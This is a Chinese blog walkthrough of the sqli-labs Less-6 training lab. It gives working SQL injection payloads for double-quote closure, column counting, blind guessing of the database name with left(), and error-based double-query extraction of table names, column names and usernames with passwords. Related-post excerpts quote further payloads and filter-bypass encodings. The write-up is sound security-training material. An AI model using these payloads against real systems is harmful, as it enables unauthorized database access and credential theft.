【网络安全】sqli-labs Less-6 解题详析

原创 已于 2025-11-04 12:40:04 修改 · 4.1k 阅读 · 3 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #数据库 #sql #sqlilabs

于 2023-07-23 09:40:04 首次发布
本文详述了SQLi-Labs Less-6关卡的解题过程,包括判断注入类型、确定注入点数量、查询数据库名、表名、列名以及字段的具体方法。

【精选优质专栏推荐】


每个专栏均配有案例与图文讲解,循序渐进,适合新手与进阶学习者,欢迎订阅。

文章目录

Less-6 和 Less-5类似,自行浏览前文即可。

【网络安全】sqli-labs Less-5 解题详析(秋说的博客)

判断注入类型

GET 1" and "1"="1 回显如下:

在这里插入图片描述

GET 1" and "1"="2

在这里插入图片描述

没有回显,说明该漏洞类型为GET型双引号字符型注入

判断注入点个数

GET1" order by 3 --+,回显如下:

在这里插入图片描述
GET1" order by 4 --+,回显如下:

在这里插入图片描述故注入点为3个

查库名

Payload:GET 1" and left((select database()),1)='a'--+
使用子查询 select database(),该语句可以获取当前数据库名称,并返回该名称的字符串表达式;通过 left() 函数获取数据库名称的首个字符。

left函数

Left函数是一种字符串函数,可以从一个字符串的左侧开始返回指定数量的字符。它的语法如下:

LEFT(str, len)

其中,str 是要截取的字符串,len 是要返回的字符数。

例如,LEFT(‘Hello, world!’, 5) 将返回 Hello,因为它只返回字符串的前5个字符

若1" and left((select database()),1)=‘a’–+查询成功,则回显you are in,即数据库名的首字母为a
因此可用此方法查询出完整的数据库名

我们可得到数据库名的首字母为s

在这里插入图片描述
继续猜第二个字母,将sa遍历到se,发现se回显成功
?id=1" and left((select database()),2)='se'--+

在这里插入图片描述
因此我们可以不断尝试得到数据库名:

在这里插入图片描述

可使用抓包字典爆破来获取数据库名,也可使用双查询注入来获取数据库名,详情参见【网络安全】sqli-labs Less-5 解题详析

示例如下:

在这里插入图片描述

查表名

双查询注入:

1" union select 1, count(*), concat((select group_concat(table_name) from information_schema.tables where table_schema = 'security'), floor(rand(0)*2)) a from information_schema.tables group by a  %23

在这里插入图片描述
回显四个表名

查users表的列名

双查询注入:

1" union select 1, count(*), concat((select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'), floor(rand(0)*2)) a from information_schema.tables group by a  %23

在这里插入图片描述

查字段

双查询注入:

1" union select 1, count(*), concat((select concat(username,':',password) from users  limit 0,1), floor(rand(0)*2)) a from information_schema.tables group by a  %23

在这里插入图片描述
将limit中的0改为1、2、3…即可:

在这里插入图片描述

精选资源
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
该资源包来源于GitHub上的一个开源项目,由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip,用户可以搭建一个模拟的SQL注入环境,从而在不危害真实系统的前提下,进行各种SQL注入攻击和防御的练习...
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
sqli-labs————less6
Fly_鹏程万里
05-09 680
Less 6源码:主要代码:$id = '"'.$id.'"'; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql);从以上代码中可以中看看,这里我们可以将“‘  ”替换为“ "  ”,之后的语句正常构造就好:这里简单演示一个猜解数据库版本信息的:猜解数据库的第一个字符:之后的内容与之前在less...
Sqli-labsLess-5和Less-6
m0_46315342的博客
06-04 1140
      这两关正确的思路是盲注。从源代码中可以看到,运行返回结果正确的时候只返回 you are in....,不会返回数据库当中的信息了(但会print_f(mysql_error()),这点很重要),所以我们不能利用前面 less1-4 的方法。 我们对比...
sql-lap less-6
qq_73722777的博客
04-12 305
当limit 1,1和limit2,1时,分别得到username和password。当id=1'"时候,语句出现报错,判断是双引号闭合。没有回显,说明对回显进行的处理,需要使用报错注入。我们先尝试对前面的语句进行闭合。其实这关大部分和less-5差不多,都考察的报错注入。当回显位等于4时,语句报错,说明回显位为3.报错注入成功,得到库名为security。得到表名users,构建语句查询字段。于是构建语句依次查询2个字段下的数据。由此类推,可以得到剩余字段。查到第3行时,发现表users。
sqli-labs-master【Less-5/6
weixin_44352521的博客
12-14 338
Less-5 1. 首先判断闭合方式和字段: http://192.168.228.129/sqli-labs-master/Less-5/?id=1' --+ 闭合方式为单引号,字段数为3; 2. 查看显示位 http://192.168.228.129/sqli-labs-master/Less-5/?id=1' union select 1,1,1 --+ 可以看到,语句已经执行了,...
Sqli-Labsless-6
ISNS的博客
02-09 779
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 我们可以看到less-6的题目提示: 得知这道题是“双注入-双引号-字符型”。 所以,这道题的除了判断注入点时是【"–+】以外,其余的解题步骤和less-5是一模一样的! 完整过程见: Sqli-Labsless-5(双注入解法) 最后的结果是: ...
sqli-labs-master.zip
01-18
Sqli-labs是一个在线的SQL注入练习平台,提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上,用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识,以便更好地应对现实世界中的网络攻击。
sqli-labs-master 靶场环境
最新发布
08-30
sqli-labs-master 靶场环境
精选资源
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
在信息技术安全领域,SQL注入是常见的攻击手段,攻击者通过在Web应用的输入字段中插入恶意SQL语句,试图破坏...phpStudy和Sqli-labs-maste的结合使用,为网络安全的学习和研究提供了一个安全、高效、便捷的学习平台。
lili‘s sqli-labs LESS06
DebbieLi_Ca的博客
02-17 178
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 第六关与第五关的不同之处是 第五关:http://localhost/sqli-labs-master/Less-5/?id=1' 第六关:http://localhost/sqli-labs-master/Less-6/?id=1" 其余步骤一样~
sqli-labs Less-5和Less-6
giun的博客
01-29 628
Less-5 首先我们观察下源码 观察源码可以看出,如果返回的结果正确就只能返回you are in…,不能得到我们要的数据,所以采用报错注入,这里我们采用floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group by ...
sqli-labs-less-6 解题全过程
yzcn
10-28 582
该题与less-5类似,只是注入点有点不同,解题方法一致。 less-5:https://blog.youkuaiyun.com/qq_46432288/article/details/109295457 判断注入点: http://127.0.0.1/sqli-labs-master/Less-6/?id=1 显示正确,you are in… http://127.0.0.1/sqli-labs-master/Less-6/?id=1’ 显示正确 http://127.0.0.1/sqli-labs-master
Sqli-labs——lesson6
weixin_62281892的博客
06-29 409
lesson6
sqli-labs通关攻略教程六(less26~less28a)
m0_55854679的博客
07-21 997
less 26 方法1 由题目可知,本题绕过了空格和注释,注释符用|| '1'='1或者;%00绕过。 空白符绕过 (1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/ (2)正则空白符:%09、%0A、%0B、%0D、%20 25%为百分号,%25A0就是空白符 绕开空格 %09——TAB键(水平) %0a——新建一行 %0c——新的一页 %0d return 功能 %0b——TAB键(垂直) %a0——空格 由源码可知,题目还将and、or等下列
sqli-labs 六至十关
2202_75317918的博客
04-09 1078
sqli-labs 六至十关
SQL——labs第5、6关(报错注入)
m0_72471814的博客
07-27 226
第二步:正确之后页面只有一个you are in。第六步:爆破账号密码。
mysql less6教程_【sqli-labsLess5~Less6
weixin_39963534的博客
01-27 263
注入原理:来源:基本句式:select count(*), concat((select database()), floor(rand()*2))as a from information_schema.tables group by a;派生表版select 1 from (select count(*), concat('~',(select user()),'~', floor(rand...
sqli-labs Less5-6(布尔盲注)
m0_60829468的博客
10-20 449
http://localhost/sqlilabs/Less-5/?id=1' and ascii(left(database(),1))>108 --+ 最终得出结果第一位字母为s(ascii码115)。 http://localhost/sqlilabs/Less-5/?id=1' and ascii(left(database(),1))=115 --+ 逐一判断得出数据库名为security。 系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手...
[网络安全]sqli-labs Less-1 解题
12-25
SQLi-Labs网络安全领域的一个练习平台,Less-1 是其中一道关于SQL注入攻击的经典题目。在这道题中,你需要利用SQL注入技巧来获取数据库中的敏感信息,通常会涉及HTML表单、GET或POST请求以及对数据库查询构造的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值